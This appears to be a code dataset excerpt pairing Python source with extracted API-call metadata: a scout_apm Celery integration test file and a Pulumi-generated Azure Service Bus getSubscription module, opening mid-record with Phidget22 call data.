'PhidgetSupport.getDll', ([], {}), '()\n', (19075, 19077), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((19168, 19194), 'ctypes.byref', 'ctypes.byref', (['_deviceLabel'], {}), '(_deviceLabel)\n', (19180, 19194), False, 'import ctypes\n'), ((19223, 19247), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (19239, 19247), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((1890, 1913), 
'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1911, 1913), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((1946, 1969), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1967, 1969), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2632, 2655), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2653, 2655), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3175, 3198), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3196, 3198), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3790, 3813), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3811, 3813), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4483, 4506), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4504, 4506), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n')]
# coding=utf-8 from __future__ import absolute_import, division, print_function, unicode_literals from contextlib import contextmanager import celery import pytest from celery.signals import setup_logging import scout_apm.celery from scout_apm.api import Config # http://docs.celeryproject.org/en/latest/userguide/testing.html#py-test skip_unless_celery_4_plus = pytest.mark.skipif( celery.VERSION < (4, 0), reason="pytest fixtures added in Celery 4.0" ) @setup_logging.connect def do_nothing(**kwargs): # Just by connecting to this signal, we prevent Celery from setting up # logging - and stop it from interfering with global state # http://docs.celeryproject.org/en/v4.3.0/userguide/signals.html#setup-logging pass @contextmanager def app_with_scout(app=None, config=None): """ Context manager that configures a Celery app with Scout installed. """ if app is None: app = celery.Celery("tasks", broker="memory://") # Enable Scout by default in tests. if config is None: config = {"monitor": True} # Disable running the agent. config["core_agent_launch"] = False @app.task def hello(): return "Hello World!" # Setup according to https://docs.scoutapm.com/#celery Config.set(**config) scout_apm.celery.install() try: yield app finally: scout_apm.celery.uninstall() # Reset Scout configuration. Config.reset_all() def test_hello_eager(tracked_requests): with app_with_scout() as app: result = app.tasks["tests.integration.test_celery.hello"].apply() assert result.result == "Hello World!" assert len(tracked_requests) == 1 tracked_request = tracked_requests[0] assert "task_id" in tracked_request.tags assert tracked_request.tags["is_eager"] is True assert tracked_request.tags["exchange"] == "unknown" assert tracked_request.tags["routing_key"] == "unknown" assert tracked_request.tags["queue"] == "unknown" assert tracked_request.active_spans == [] assert len(tracked_request.complete_spans) == 1 span = tracked_request.complete_spans[0] assert span.operation == "Job/tests.integration.test_celery.hello" @skip_unless_celery_4_plus def test_hello_worker(celery_app, celery_worker, tracked_requests): with app_with_scout(app=celery_app) as app: result = app.tasks["tests.integration.test_celery.hello"].delay().get() assert result == "Hello World!" assert len(tracked_requests) == 1 tracked_request = tracked_requests[0] assert "task_id" in tracked_request.tags assert tracked_request.tags["is_eager"] is False assert tracked_request.tags["exchange"] == "" assert tracked_request.tags["routing_key"] == "celery" assert tracked_request.tags["queue"] == "unknown" assert ( 0.0 <= tracked_request.tags["queue_time"] < 60.0 ) # Assume test took <60 seconds assert tracked_request.active_spans == [] assert len(tracked_request.complete_spans) == 1 span = tracked_request.complete_spans[0] assert span.operation == "Job/tests.integration.test_celery.hello" @skip_unless_celery_4_plus def test_hello_worker_header_preset(celery_app, celery_worker, tracked_requests): with app_with_scout(app=celery_app) as app: result = ( app.tasks["tests.integration.test_celery.hello"] .apply_async(headers={"scout_task_start": "an evil string"}) .get() ) assert result == "Hello World!" 
assert len(tracked_requests) == 1 tracked_request = tracked_requests[0] assert tracked_request.active_spans == [] assert len(tracked_request.complete_spans) == 1 span = tracked_request.complete_spans[0] assert span.operation == "Job/tests.integration.test_celery.hello" assert "queue_time" not in span.tags @skip_unless_celery_4_plus def test_hello_worker_chain(celery_app, celery_worker, tracked_requests): with app_with_scout(app=celery_app) as app: hello = app.tasks["tests.integration.test_celery.hello"] result = (hello.si() | hello.si()).apply_async().get() assert result == "Hello World!" assert len(tracked_requests) == 2 assert [t.complete_spans[0].operation for t in tracked_requests] == [ "Job/tests.integration.test_celery.hello", "Job/tests.integration.test_celery.hello", ] assert "parent_task_id" not in tracked_requests[0].tags first_task_id = tracked_requests[0].tags["task_id"] assert tracked_requests[1].tags["parent_task_id"] == first_task_id def test_no_monitor(tracked_requests): # With an empty config, "monitor" defaults to False. with app_with_scout(config={}) as app: result = app.tasks["tests.integration.test_celery.hello"].apply() assert result.result == "Hello World!" assert tracked_requests == []
[ "scout_apm.api.Config.set", "celery.Celery", "scout_apm.api.Config.reset_all", "pytest.mark.skipif" ]
[((367, 461), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(celery.VERSION < (4, 0))'], {'reason': '"""pytest fixtures added in Celery 4.0"""'}), "(celery.VERSION < (4, 0), reason=\n 'pytest fixtures added in Celery 4.0')\n", (385, 461), False, 'import pytest\n'), ((1268, 1288), 'scout_apm.api.Config.set', 'Config.set', ([], {}), '(**config)\n', (1278, 1288), False, 'from scout_apm.api import Config\n'), ((926, 968), 'celery.Celery', 'celery.Celery', (['"""tasks"""'], {'broker': '"""memory://"""'}), "('tasks', broker='memory://')\n", (939, 968), False, 'import celery\n'), ((1443, 1461), 'scout_apm.api.Config.reset_all', 'Config.reset_all', ([], {}), '()\n', (1459, 1461), False, 'from scout_apm.api import Config\n')]
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities from . import outputs __all__ = [ 'GetSubscriptionResult', 'AwaitableGetSubscriptionResult', 'get_subscription', ] @pulumi.output_type class GetSubscriptionResult: """ Description of subscription resource. """ def __init__(__self__, accessed_at=None, auto_delete_on_idle=None, client_affine_properties=None, count_details=None, created_at=None, dead_lettering_on_filter_evaluation_exceptions=None, dead_lettering_on_message_expiration=None, default_message_time_to_live=None, duplicate_detection_history_time_window=None, enable_batched_operations=None, forward_dead_lettered_messages_to=None, forward_to=None, id=None, is_client_affine=None, lock_duration=None, max_delivery_count=None, message_count=None, name=None, requires_session=None, status=None, system_data=None, type=None, updated_at=None): if accessed_at and not isinstance(accessed_at, str): raise TypeError("Expected argument 'accessed_at' to be a str") pulumi.set(__self__, "accessed_at", accessed_at) if auto_delete_on_idle and not isinstance(auto_delete_on_idle, str): raise TypeError("Expected argument 'auto_delete_on_idle' to be a str") pulumi.set(__self__, "auto_delete_on_idle", auto_delete_on_idle) if client_affine_properties and not isinstance(client_affine_properties, dict): raise TypeError("Expected argument 'client_affine_properties' to be a dict") pulumi.set(__self__, "client_affine_properties", client_affine_properties) if count_details and not isinstance(count_details, dict): raise TypeError("Expected argument 'count_details' to be a dict") pulumi.set(__self__, "count_details", count_details) if created_at and not isinstance(created_at, str): raise TypeError("Expected argument 'created_at' to be a str") pulumi.set(__self__, "created_at", created_at) if dead_lettering_on_filter_evaluation_exceptions and not isinstance(dead_lettering_on_filter_evaluation_exceptions, bool): raise TypeError("Expected argument 'dead_lettering_on_filter_evaluation_exceptions' to be a bool") pulumi.set(__self__, "dead_lettering_on_filter_evaluation_exceptions", dead_lettering_on_filter_evaluation_exceptions) if dead_lettering_on_message_expiration and not isinstance(dead_lettering_on_message_expiration, bool): raise TypeError("Expected argument 'dead_lettering_on_message_expiration' to be a bool") pulumi.set(__self__, "dead_lettering_on_message_expiration", dead_lettering_on_message_expiration) if default_message_time_to_live and not isinstance(default_message_time_to_live, str): raise TypeError("Expected argument 'default_message_time_to_live' to be a str") pulumi.set(__self__, "default_message_time_to_live", default_message_time_to_live) if duplicate_detection_history_time_window and not isinstance(duplicate_detection_history_time_window, str): raise TypeError("Expected argument 'duplicate_detection_history_time_window' to be a str") pulumi.set(__self__, "duplicate_detection_history_time_window", duplicate_detection_history_time_window) if enable_batched_operations and not isinstance(enable_batched_operations, bool): raise TypeError("Expected argument 'enable_batched_operations' to be a bool") pulumi.set(__self__, "enable_batched_operations", enable_batched_operations) if forward_dead_lettered_messages_to and not 
isinstance(forward_dead_lettered_messages_to, str): raise TypeError("Expected argument 'forward_dead_lettered_messages_to' to be a str") pulumi.set(__self__, "forward_dead_lettered_messages_to", forward_dead_lettered_messages_to) if forward_to and not isinstance(forward_to, str): raise TypeError("Expected argument 'forward_to' to be a str") pulumi.set(__self__, "forward_to", forward_to) if id and not isinstance(id, str): raise TypeError("Expected argument 'id' to be a str") pulumi.set(__self__, "id", id) if is_client_affine and not isinstance(is_client_affine, bool): raise TypeError("Expected argument 'is_client_affine' to be a bool") pulumi.set(__self__, "is_client_affine", is_client_affine) if lock_duration and not isinstance(lock_duration, str): raise TypeError("Expected argument 'lock_duration' to be a str") pulumi.set(__self__, "lock_duration", lock_duration) if max_delivery_count and not isinstance(max_delivery_count, int): raise TypeError("Expected argument 'max_delivery_count' to be a int") pulumi.set(__self__, "max_delivery_count", max_delivery_count) if message_count and not isinstance(message_count, float): raise TypeError("Expected argument 'message_count' to be a float") pulumi.set(__self__, "message_count", message_count) if name and not isinstance(name, str): raise TypeError("Expected argument 'name' to be a str") pulumi.set(__self__, "name", name) if requires_session and not isinstance(requires_session, bool): raise TypeError("Expected argument 'requires_session' to be a bool") pulumi.set(__self__, "requires_session", requires_session) if status and not isinstance(status, str): raise TypeError("Expected argument 'status' to be a str") pulumi.set(__self__, "status", status) if system_data and not isinstance(system_data, dict): raise TypeError("Expected argument 'system_data' to be a dict") pulumi.set(__self__, "system_data", system_data) if type and not isinstance(type, str): raise TypeError("Expected argument 'type' to be a str") pulumi.set(__self__, "type", type) if updated_at and not isinstance(updated_at, str): raise TypeError("Expected argument 'updated_at' to be a str") pulumi.set(__self__, "updated_at", updated_at) @property @pulumi.getter(name="accessedAt") def accessed_at(self) -> str: """ Last time there was a receive request to this subscription. """ return pulumi.get(self, "accessed_at") @property @pulumi.getter(name="autoDeleteOnIdle") def auto_delete_on_idle(self) -> Optional[str]: """ ISO 8061 timeSpan idle interval after which the topic is automatically deleted. The minimum duration is 5 minutes. """ return pulumi.get(self, "auto_delete_on_idle") @property @pulumi.getter(name="clientAffineProperties") def client_affine_properties(self) -> Optional['outputs.SBClientAffinePropertiesResponse']: """ Properties specific to client affine subscriptions. """ return pulumi.get(self, "client_affine_properties") @property @pulumi.getter(name="countDetails") def count_details(self) -> 'outputs.MessageCountDetailsResponse': """ Message count details """ return pulumi.get(self, "count_details") @property @pulumi.getter(name="createdAt") def created_at(self) -> str: """ Exact time the message was created. """ return pulumi.get(self, "created_at") @property @pulumi.getter(name="deadLetteringOnFilterEvaluationExceptions") def dead_lettering_on_filter_evaluation_exceptions(self) -> Optional[bool]: """ Value that indicates whether a subscription has dead letter support on filter evaluation exceptions. 
""" return pulumi.get(self, "dead_lettering_on_filter_evaluation_exceptions") @property @pulumi.getter(name="deadLetteringOnMessageExpiration") def dead_lettering_on_message_expiration(self) -> Optional[bool]: """ Value that indicates whether a subscription has dead letter support when a message expires. """ return pulumi.get(self, "dead_lettering_on_message_expiration") @property @pulumi.getter(name="defaultMessageTimeToLive") def default_message_time_to_live(self) -> Optional[str]: """ ISO 8061 Default message timespan to live value. This is the duration after which the message expires, starting from when the message is sent to Service Bus. This is the default value used when TimeToLive is not set on a message itself. """ return pulumi.get(self, "default_message_time_to_live") @property @pulumi.getter(name="duplicateDetectionHistoryTimeWindow") def duplicate_detection_history_time_window(self) -> Optional[str]: """ ISO 8601 timeSpan structure that defines the duration of the duplicate detection history. The default value is 10 minutes. """ return pulumi.get(self, "duplicate_detection_history_time_window") @property @pulumi.getter(name="enableBatchedOperations") def enable_batched_operations(self) -> Optional[bool]: """ Value that indicates whether server-side batched operations are enabled. """ return pulumi.get(self, "enable_batched_operations") @property @pulumi.getter(name="forwardDeadLetteredMessagesTo") def forward_dead_lettered_messages_to(self) -> Optional[str]: """ Queue/Topic name to forward the Dead Letter message """ return pulumi.get(self, "forward_dead_lettered_messages_to") @property @pulumi.getter(name="forwardTo") def forward_to(self) -> Optional[str]: """ Queue/Topic name to forward the messages """ return pulumi.get(self, "forward_to") @property @pulumi.getter def id(self) -> str: """ Resource Id """ return pulumi.get(self, "id") @property @pulumi.getter(name="isClientAffine") def is_client_affine(self) -> Optional[bool]: """ Value that indicates whether the subscription has an affinity to the client id. """ return pulumi.get(self, "is_client_affine") @property @pulumi.getter(name="lockDuration") def lock_duration(self) -> Optional[str]: """ ISO 8061 lock duration timespan for the subscription. The default value is 1 minute. """ return pulumi.get(self, "lock_duration") @property @pulumi.getter(name="maxDeliveryCount") def max_delivery_count(self) -> Optional[int]: """ Number of maximum deliveries. """ return pulumi.get(self, "max_delivery_count") @property @pulumi.getter(name="messageCount") def message_count(self) -> float: """ Number of messages. """ return pulumi.get(self, "message_count") @property @pulumi.getter def name(self) -> str: """ Resource name """ return pulumi.get(self, "name") @property @pulumi.getter(name="requiresSession") def requires_session(self) -> Optional[bool]: """ Value indicating if a subscription supports the concept of sessions. """ return pulumi.get(self, "requires_session") @property @pulumi.getter def status(self) -> Optional[str]: """ Enumerates the possible values for the status of a messaging entity. """ return pulumi.get(self, "status") @property @pulumi.getter(name="systemData") def system_data(self) -> 'outputs.SystemDataResponse': """ The system meta data relating to this resource. 
""" return pulumi.get(self, "system_data") @property @pulumi.getter def type(self) -> str: """ Resource type """ return pulumi.get(self, "type") @property @pulumi.getter(name="updatedAt") def updated_at(self) -> str: """ The exact time the message was updated. """ return pulumi.get(self, "updated_at") class AwaitableGetSubscriptionResult(GetSubscriptionResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetSubscriptionResult( accessed_at=self.accessed_at, auto_delete_on_idle=self.auto_delete_on_idle, client_affine_properties=self.client_affine_properties, count_details=self.count_details, created_at=self.created_at, dead_lettering_on_filter_evaluation_exceptions=self.dead_lettering_on_filter_evaluation_exceptions, dead_lettering_on_message_expiration=self.dead_lettering_on_message_expiration, default_message_time_to_live=self.default_message_time_to_live, duplicate_detection_history_time_window=self.duplicate_detection_history_time_window, enable_batched_operations=self.enable_batched_operations, forward_dead_lettered_messages_to=self.forward_dead_lettered_messages_to, forward_to=self.forward_to, id=self.id, is_client_affine=self.is_client_affine, lock_duration=self.lock_duration, max_delivery_count=self.max_delivery_count, message_count=self.message_count, name=self.name, requires_session=self.requires_session, status=self.status, system_data=self.system_data, type=self.type, updated_at=self.updated_at) def get_subscription(namespace_name: Optional[str] = None, resource_group_name: Optional[str] = None, subscription_name: Optional[str] = None, topic_name: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubscriptionResult: """ Description of subscription resource. :param str namespace_name: The namespace name :param str resource_group_name: Name of the Resource group within the Azure subscription. :param str subscription_name: The subscription name. :param str topic_name: The topic name. 
""" __args__ = dict() __args__['namespaceName'] = namespace_name __args__['resourceGroupName'] = resource_group_name __args__['subscriptionName'] = subscription_name __args__['topicName'] = topic_name if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('azure-native:servicebus/v20210601preview:getSubscription', __args__, opts=opts, typ=GetSubscriptionResult).value return AwaitableGetSubscriptionResult( accessed_at=__ret__.accessed_at, auto_delete_on_idle=__ret__.auto_delete_on_idle, client_affine_properties=__ret__.client_affine_properties, count_details=__ret__.count_details, created_at=__ret__.created_at, dead_lettering_on_filter_evaluation_exceptions=__ret__.dead_lettering_on_filter_evaluation_exceptions, dead_lettering_on_message_expiration=__ret__.dead_lettering_on_message_expiration, default_message_time_to_live=__ret__.default_message_time_to_live, duplicate_detection_history_time_window=__ret__.duplicate_detection_history_time_window, enable_batched_operations=__ret__.enable_batched_operations, forward_dead_lettered_messages_to=__ret__.forward_dead_lettered_messages_to, forward_to=__ret__.forward_to, id=__ret__.id, is_client_affine=__ret__.is_client_affine, lock_duration=__ret__.lock_duration, max_delivery_count=__ret__.max_delivery_count, message_count=__ret__.message_count, name=__ret__.name, requires_session=__ret__.requires_session, status=__ret__.status, system_data=__ret__.system_data, type=__ret__.type, updated_at=__ret__.updated_at)
[ "pulumi.get", "pulumi.getter", "pulumi.set", "pulumi.InvokeOptions", "pulumi.runtime.invoke" ]
[((6398, 6430), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""accessedAt"""'}), "(name='accessedAt')\n", (6411, 6430), False, 'import pulumi\n'), ((6624, 6662), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""autoDeleteOnIdle"""'}), "(name='autoDeleteOnIdle')\n", (6637, 6662), False, 'import pulumi\n'), ((6937, 6981), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""clientAffineProperties"""'}), "(name='clientAffineProperties')\n", (6950, 6981), False, 'import pulumi\n'), ((7242, 7276), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""countDetails"""'}), "(name='countDetails')\n", (7255, 7276), False, 'import pulumi\n'), ((7470, 7501), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""createdAt"""'}), "(name='createdAt')\n", (7483, 7501), False, 'import pulumi\n'), ((7669, 7732), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnFilterEvaluationExceptions"""'}), "(name='deadLetteringOnFilterEvaluationExceptions')\n", (7682, 7732), False, 'import pulumi\n'), ((8048, 8102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnMessageExpiration"""'}), "(name='deadLetteringOnMessageExpiration')\n", (8061, 8102), False, 'import pulumi\n'), ((8389, 8435), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""defaultMessageTimeToLive"""'}), "(name='defaultMessageTimeToLive')\n", (8402, 8435), False, 'import pulumi\n'), ((8850, 8907), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""duplicateDetectionHistoryTimeWindow"""'}), "(name='duplicateDetectionHistoryTimeWindow')\n", (8863, 8907), False, 'import pulumi\n'), ((9230, 9275), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""enableBatchedOperations"""'}), "(name='enableBatchedOperations')\n", (9243, 9275), False, 'import pulumi\n'), ((9521, 9572), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardDeadLetteredMessagesTo"""'}), "(name='forwardDeadLetteredMessagesTo')\n", (9534, 9572), False, 'import pulumi\n'), ((9812, 9843), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardTo"""'}), "(name='forwardTo')\n", (9825, 9843), False, 'import pulumi\n'), ((10167, 10203), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""isClientAffine"""'}), "(name='isClientAffine')\n", (10180, 10203), False, 'import pulumi\n'), ((10438, 10472), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""lockDuration"""'}), "(name='lockDuration')\n", (10451, 10472), False, 'import pulumi\n'), ((10705, 10743), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""maxDeliveryCount"""'}), "(name='maxDeliveryCount')\n", (10718, 10743), False, 'import pulumi\n'), ((10931, 10965), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""messageCount"""'}), "(name='messageCount')\n", (10944, 10965), False, 'import pulumi\n'), ((11272, 11309), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""requiresSession"""'}), "(name='requiresSession')\n", (11285, 11309), False, 'import pulumi\n'), ((11749, 11781), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""systemData"""'}), "(name='systemData')\n", (11762, 11781), False, 'import pulumi\n'), ((12135, 12166), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""updatedAt"""'}), "(name='updatedAt')\n", (12148, 12166), False, 'import pulumi\n'), ((1293, 1341), 'pulumi.set', 'pulumi.set', (['__self__', '"""accessed_at"""', 'accessed_at'], {}), "(__self__, 'accessed_at', accessed_at)\n", (1303, 1341), False, 'import pulumi\n'), ((1510, 1574), 'pulumi.set', 'pulumi.set', (['__self__', '"""auto_delete_on_idle"""', 'auto_delete_on_idle'], {}), "(__self__, 'auto_delete_on_idle', 
auto_delete_on_idle)\n", (1520, 1574), False, 'import pulumi\n'), ((1760, 1834), 'pulumi.set', 'pulumi.set', (['__self__', '"""client_affine_properties"""', 'client_affine_properties'], {}), "(__self__, 'client_affine_properties', client_affine_properties)\n", (1770, 1834), False, 'import pulumi\n'), ((1987, 2039), 'pulumi.set', 'pulumi.set', (['__self__', '"""count_details"""', 'count_details'], {}), "(__self__, 'count_details', count_details)\n", (1997, 2039), False, 'import pulumi\n'), ((2181, 2227), 'pulumi.set', 'pulumi.set', (['__self__', '"""created_at"""', 'created_at'], {}), "(__self__, 'created_at', created_at)\n", (2191, 2227), False, 'import pulumi\n'), ((2479, 2601), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_filter_evaluation_exceptions"""', 'dead_lettering_on_filter_evaluation_exceptions'], {}), "(__self__, 'dead_lettering_on_filter_evaluation_exceptions',\n dead_lettering_on_filter_evaluation_exceptions)\n", (2489, 2601), False, 'import pulumi\n'), ((2819, 2921), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_message_expiration"""', 'dead_lettering_on_message_expiration'], {}), "(__self__, 'dead_lettering_on_message_expiration',\n dead_lettering_on_message_expiration)\n", (2829, 2921), False, 'import pulumi\n'), ((3113, 3199), 'pulumi.set', 'pulumi.set', (['__self__', '"""default_message_time_to_live"""', 'default_message_time_to_live'], {}), "(__self__, 'default_message_time_to_live',\n default_message_time_to_live)\n", (3123, 3199), False, 'import pulumi\n'), ((3424, 3532), 'pulumi.set', 'pulumi.set', (['__self__', '"""duplicate_detection_history_time_window"""', 'duplicate_detection_history_time_window'], {}), "(__self__, 'duplicate_detection_history_time_window',\n duplicate_detection_history_time_window)\n", (3434, 3532), False, 'import pulumi\n'), ((3717, 3793), 'pulumi.set', 'pulumi.set', (['__self__', '"""enable_batched_operations"""', 'enable_batched_operations'], {}), "(__self__, 'enable_batched_operations', enable_batched_operations)\n", (3727, 3793), False, 'import pulumi\n'), ((4004, 4100), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_dead_lettered_messages_to"""', 'forward_dead_lettered_messages_to'], {}), "(__self__, 'forward_dead_lettered_messages_to',\n forward_dead_lettered_messages_to)\n", (4014, 4100), False, 'import pulumi\n'), ((4238, 4284), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_to"""', 'forward_to'], {}), "(__self__, 'forward_to', forward_to)\n", (4248, 4284), False, 'import pulumi\n'), ((4402, 4432), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (4412, 4432), False, 'import pulumi\n'), ((4594, 4652), 'pulumi.set', 'pulumi.set', (['__self__', '"""is_client_affine"""', 'is_client_affine'], {}), "(__self__, 'is_client_affine', is_client_affine)\n", (4604, 4652), False, 'import pulumi\n'), ((4803, 4855), 'pulumi.set', 'pulumi.set', (['__self__', '"""lock_duration"""', 'lock_duration'], {}), "(__self__, 'lock_duration', lock_duration)\n", (4813, 4855), False, 'import pulumi\n'), ((5021, 5083), 'pulumi.set', 'pulumi.set', (['__self__', '"""max_delivery_count"""', 'max_delivery_count'], {}), "(__self__, 'max_delivery_count', max_delivery_count)\n", (5031, 5083), False, 'import pulumi\n'), ((5238, 5290), 'pulumi.set', 'pulumi.set', (['__self__', '"""message_count"""', 'message_count'], {}), "(__self__, 'message_count', message_count)\n", (5248, 5290), False, 'import pulumi\n'), ((5414, 5448), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 
'name'], {}), "(__self__, 'name', name)\n", (5424, 5448), False, 'import pulumi\n'), ((5610, 5668), 'pulumi.set', 'pulumi.set', (['__self__', '"""requires_session"""', 'requires_session'], {}), "(__self__, 'requires_session', requires_session)\n", (5620, 5668), False, 'import pulumi\n'), ((5798, 5836), 'pulumi.set', 'pulumi.set', (['__self__', '"""status"""', 'status'], {}), "(__self__, 'status', status)\n", (5808, 5836), False, 'import pulumi\n'), ((5983, 6031), 'pulumi.set', 'pulumi.set', (['__self__', '"""system_data"""', 'system_data'], {}), "(__self__, 'system_data', system_data)\n", (5993, 6031), False, 'import pulumi\n'), ((6155, 6189), 'pulumi.set', 'pulumi.set', (['__self__', '"""type"""', 'type'], {}), "(__self__, 'type', type)\n", (6165, 6189), False, 'import pulumi\n'), ((6331, 6377), 'pulumi.set', 'pulumi.set', (['__self__', '"""updated_at"""', 'updated_at'], {}), "(__self__, 'updated_at', updated_at)\n", (6341, 6377), False, 'import pulumi\n'), ((6572, 6603), 'pulumi.get', 'pulumi.get', (['self', '"""accessed_at"""'], {}), "(self, 'accessed_at')\n", (6582, 6603), False, 'import pulumi\n'), ((6877, 6916), 'pulumi.get', 'pulumi.get', (['self', '"""auto_delete_on_idle"""'], {}), "(self, 'auto_delete_on_idle')\n", (6887, 6916), False, 'import pulumi\n'), ((7177, 7221), 'pulumi.get', 'pulumi.get', (['self', '"""client_affine_properties"""'], {}), "(self, 'client_affine_properties')\n", (7187, 7221), False, 'import pulumi\n'), ((7416, 7449), 'pulumi.get', 'pulumi.get', (['self', '"""count_details"""'], {}), "(self, 'count_details')\n", (7426, 7449), False, 'import pulumi\n'), ((7618, 7648), 'pulumi.get', 'pulumi.get', (['self', '"""created_at"""'], {}), "(self, 'created_at')\n", (7628, 7648), False, 'import pulumi\n'), ((7961, 8027), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_filter_evaluation_exceptions"""'], {}), "(self, 'dead_lettering_on_filter_evaluation_exceptions')\n", (7971, 8027), False, 'import pulumi\n'), ((8312, 8368), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_message_expiration"""'], {}), "(self, 'dead_lettering_on_message_expiration')\n", (8322, 8368), False, 'import pulumi\n'), ((8781, 8829), 'pulumi.get', 'pulumi.get', (['self', '"""default_message_time_to_live"""'], {}), "(self, 'default_message_time_to_live')\n", (8791, 8829), False, 'import pulumi\n'), ((9150, 9209), 'pulumi.get', 'pulumi.get', (['self', '"""duplicate_detection_history_time_window"""'], {}), "(self, 'duplicate_detection_history_time_window')\n", (9160, 9209), False, 'import pulumi\n'), ((9455, 9500), 'pulumi.get', 'pulumi.get', (['self', '"""enable_batched_operations"""'], {}), "(self, 'enable_batched_operations')\n", (9465, 9500), False, 'import pulumi\n'), ((9738, 9791), 'pulumi.get', 'pulumi.get', (['self', '"""forward_dead_lettered_messages_to"""'], {}), "(self, 'forward_dead_lettered_messages_to')\n", (9748, 9791), False, 'import pulumi\n'), ((9975, 10005), 'pulumi.get', 'pulumi.get', (['self', '"""forward_to"""'], {}), "(self, 'forward_to')\n", (9985, 10005), False, 'import pulumi\n'), ((10124, 10146), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (10134, 10146), False, 'import pulumi\n'), ((10381, 10417), 'pulumi.get', 'pulumi.get', (['self', '"""is_client_affine"""'], {}), "(self, 'is_client_affine')\n", (10391, 10417), False, 'import pulumi\n'), ((10651, 10684), 'pulumi.get', 'pulumi.get', (['self', '"""lock_duration"""'], {}), "(self, 'lock_duration')\n", (10661, 10684), False, 'import pulumi\n'), ((10872, 10910), 
'pulumi.get', 'pulumi.get', (['self', '"""max_delivery_count"""'], {}), "(self, 'max_delivery_count')\n", (10882, 10910), False, 'import pulumi\n'), ((11071, 11104), 'pulumi.get', 'pulumi.get', (['self', '"""message_count"""'], {}), "(self, 'message_count')\n", (11081, 11104), False, 'import pulumi\n'), ((11227, 11251), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (11237, 11251), False, 'import pulumi\n'), ((11476, 11512), 'pulumi.get', 'pulumi.get', (['self', '"""requires_session"""'], {}), "(self, 'requires_session')\n", (11486, 11512), False, 'import pulumi\n'), ((11702, 11728), 'pulumi.get', 'pulumi.get', (['self', '"""status"""'], {}), "(self, 'status')\n", (11712, 11728), False, 'import pulumi\n'), ((11936, 11967), 'pulumi.get', 'pulumi.get', (['self', '"""system_data"""'], {}), "(self, 'system_data')\n", (11946, 11967), False, 'import pulumi\n'), ((12090, 12114), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (12100, 12114), False, 'import pulumi\n'), ((12287, 12317), 'pulumi.get', 'pulumi.get', (['self', '"""updated_at"""'], {}), "(self, 'updated_at')\n", (12297, 12317), False, 'import pulumi\n'), ((14701, 14723), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (14721, 14723), False, 'import pulumi\n'), ((14815, 14953), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""azure-native:servicebus/v20210601preview:getSubscription"""', '__args__'], {'opts': 'opts', 'typ': 'GetSubscriptionResult'}), "(\n 'azure-native:servicebus/v20210601preview:getSubscription', __args__,\n opts=opts, typ=GetSubscriptionResult)\n", (14836, 14953), False, 'import pulumi\n')]
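The offset pairs in the list above record where each pulumi accessor call appears in the generated Azure Service Bus GetSubscriptionResult module. For reference, a minimal sketch of the decorator/accessor pattern those spans point at is given below, assuming the pulumi Python SDK is installed; the trimmed-down class body and the choice of properties are illustrative, not a copy of the record.

import pulumi


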